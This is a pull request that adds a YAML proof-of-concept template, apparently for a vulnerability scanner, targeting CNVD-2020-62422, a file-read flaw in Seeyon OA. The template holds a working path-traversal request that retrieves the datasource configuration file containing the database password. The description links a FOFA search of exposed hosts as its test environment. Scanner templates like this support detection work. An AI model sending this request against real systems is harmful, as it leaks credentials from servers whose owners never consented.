### PR TITLE
add poc seeyon-cnvd-2020-62422-readfile.yml

### DIFF
--- a/pocs/seeyon-cnvd-2020-62422-readfile.yml
+++ b/pocs/seeyon-cnvd-2020-62422-readfile.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-seeyon-cnvd-2020-62422-readfile
+rules:
+  - method: GET
+    path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
+    follow_redirects: false
+    expression: response.status == 200 && response.headers["Content-Type"] == "application/x-msdownload" && response.body.bcontains(b"ctpDataSource.password")
+detail:
+  author: Aquilao(https://github.com/Aquilao)
+  info: seeyon readfile(CNVD-2020-62422)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422

--- a/pocs/seeyon-cnvd-2020-62422-readfile.yml
+++ b/pocs/seeyon-cnvd-2020-62422-readfile.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
     follow_redirects: false
-    expression: response.status == 200 && response.content_type.icontains("application/x-msdownload;charset=UTF-8") && response.body.bcontains(b"ctpDataSource.password")
+    expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
 detail:
   author: Aquilao(https://github.com/Aquilao)
   info: seeyon readfile(CNVD-2020-62422)

--- a/pocs/seeyon-cnvd-2020-62422-readfile.yml
+++ b/pocs/seeyon-cnvd-2020-62422-readfile.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
     follow_redirects: false
-    expression: response.status == 200 && response.headers["Content-Type"] == "application/x-msdownload" && response.body.bcontains(b"ctpDataSource.password")
+    expression: response.status == 200 && response.content_type.icontains("application/x-msdownload;charset=UTF-8") && response.body.bcontains(b"ctpDataSource.password")
 detail:
   author: Aquilao(https://github.com/Aquilao)
   info: seeyon readfile(CNVD-2020-62422)


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

CNVD-2020-62422 致远OA文件读取

## 测试环境

https://fofa.so/result?qbase64=dGl0bGU9IuiHtOi%2FnEE4LVY15Y2P5ZCM566h55CG6L2v5Lu2IFY2LjBTUDEi

![](https://user-images.githubusercontent.com/25531497/104561315-2ddb0e00-5682-11eb-88bd-478fa587030d.png)
![image](https://user-images.githubusercontent.com/25531497/104563038-20bf1e80-5684-11eb-9491-1872f04760e9.png)

## 备注

无
